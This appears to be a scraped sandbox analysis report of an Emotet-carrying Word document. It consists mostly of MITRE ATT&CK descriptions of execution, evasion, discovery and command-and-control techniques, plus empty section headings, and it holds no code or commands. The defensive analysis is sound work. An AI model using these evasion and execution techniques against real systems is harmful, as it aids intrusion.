Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Documenten_9274874 8574977265.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Documenten_9274874 8574977265.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117

General

VBA Code Keywords

VBA Code

VBA File Name: Owppnp8hah4xo788, Stream Size: 17915

General

VBA Code Keywords

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre